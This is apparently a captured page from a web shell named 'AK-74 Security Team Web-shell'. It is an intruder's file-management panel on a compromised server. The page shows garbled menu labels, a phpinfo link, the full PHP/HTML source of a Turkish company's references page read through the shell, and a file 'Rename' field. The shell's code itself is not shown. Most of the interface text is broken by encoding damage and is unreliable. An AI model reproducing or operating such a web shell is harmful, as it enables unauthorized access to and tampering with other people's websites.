.:: :[ AK-74 Security Team Web-shell ]: ::.
����� ����������
�������� ��������
phpinfo()
��������� PHP
��������� �������
�������������� �����
<!DOCTYPE html> <!--[if IE 6]> <html id="ie6" class="ancient-ie old-ie no-js" dir="ltr"> <![endif]--> <!--[if IE 7]> <html id="ie7" class="ancient-ie old-ie no-js" dir="ltr"> <![endif]--> <!--[if IE 8]> <html id="ie8" class="old-ie no-js" dir="ltr"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ]><!--> <?php include('db.php'); $yar = $bag->query("select * from ayarlar where ayar_id=1")->fetch(PDO::FETCH_ASSOC); ?> <html dir="ltr" class="no-js"> <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta name="viewport" content="initial-scale=1, maximum-scale=2"> <title><?php echo $yar['siteadi'] ?> | Referanslar </title> <base href="<?php echo $yar['siteurl'] ?>"/> <meta keywords="<?php echo $yar['keywords'] ?>"/> <!--[if IE]> <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link href="css/normalize.css" rel="stylesheet" type="text/css"> <link href="css/wireframe.css" rel="stylesheet" type="text/css"> <link href="css/main.css" rel="stylesheet" type="text/css"> <link href="css/media.css" rel="stylesheet" type="text/css"> <link href="skins/red/custom.css" rel="stylesheet" type="text/css" id="skin-style"> <!-- RoyalSlider --> <link rel="stylesheet" href="royalslider/royalslider.css"> <link rel="stylesheet" href="css/plugins.css"> <link rel="stylesheet" href="js/plugins/pretty-photo/css/prettyPhoto.css" type="text/css"> <link href="http://fonts.googleapis.com/css?family=Lato:400,700,900" rel="stylesheet" type="text/css"> <!-- All skins --> <link href="http://fonts.googleapis.com/css?family=Titillium+Web:600,600italic" rel="stylesheet" type="text/css"> <!-- "Retro" skin --> <link href="http://fonts.googleapis.com/css?family=Patua+One" rel="stylesheet" type="text/css"> <!-- "Business" skin --> <link href="http://fonts.googleapis.com/css?family=Roboto+Condensed" rel="stylesheet" type="text/css"> <!-- "Green" skin --> <link href="http://fonts.googleapis.com/css?family=Sanchez" rel="stylesheet" type="text/css"> <!-- "Organic" skin --> <script src="js/modernizr.js"></script> </head> <body class="page"> <div id="page" ><!-- class="boxed" --> <!-- !Top-bar --> <?php include('ust.php'); ?> <header id="header" class="logo-left" role="banner"><!-- class="overlap"; class="logo-left", class="logo-center", class="logo-classic" --> <div class="wf-wrap"> <div class="wf-table"> <!-- !- Branding --> <div id="brandin" class="wf-td"> <?php include('db.php'); $logo = $bag->query("select * from sitelogo where logo_id=1")->fetch(PDO::FETCH_ASSOC); ?> <a href="anasayfa"><img src="usr/<?php echo $logo['logo']; ?>" width="189" height="79" alt=""></a> </div> <!-- !- Navigation --> <?php include('header.php'); ?> </div><!-- .wf-table --> </div><!-- .wf-wrap --> </header><!-- #header --> <!-- !Main --> <div id="main" class="sidebar-none"><!-- class="sidebar-none", class="sidebar-left", class="sidebar-right" --> <div class="wf-wrap"> <div class="wf-container-main"> <!-- !- Content --> <div class="content"> <h1>Referanslarımız</h1> <div class="hr-breadcrumbs divider-heder"> <div class="assistive-text">Buradasınız:</div> <ol class="breadcrumbs wf-td text-small"> <li><a href="anasayfa">Ana Sayfa</a></li> <li><a href="#">Referanslar</a></li> </ol> </div> <section class="logos-grid wf-container"><!-- class="icons-bg" --> <?php include('db.php'); $par = $bag->query("select * from referans")->fetchAll(PDO::FETCH_ASSOC); foreach($par as $pur){ ?> <div class="wf-cell wf-1-4"> <div class="borders"> <a target="_blank" title="Konstruktor" href="#"><img width="185" height="86" alt="Konstruktor" src="usr/referans/<?php echo $pur['logo']; ?>"></a> </div> </div> <?php } ?> </section> <!-- !-- Benefits --> <div class="hr-thick"></div> <div class="gap-40"></div> <!-- !-- Benefits --> </div><!-- .content --> </div><!-- .wf-container-main --> </div><!-- .wf-wrap --> </div><!-- #main --> <?php include('footer.php'); ?> <!-- !Bottom-bar --> <?php include('alt.php'); ?> </div><!-- #page --> <script src="js/jquery-1.9.1.min.js"></script> <script src="js/jquery-migrate-1.1.1.min.js"></script> <!-- RoyalSlider --> <script src="royalslider/jquery.royalslider.js"></script> <script src="js/plugins/pretty-photo/js/jquery.prettyPhoto.js"></script> <script src="js/plugins.js"></script> <script src="js/main.js"></script> <link rel="stylesheet" href="presscore-demo/css/show.css" type="text/css" /> </body> </html>
Rename:
-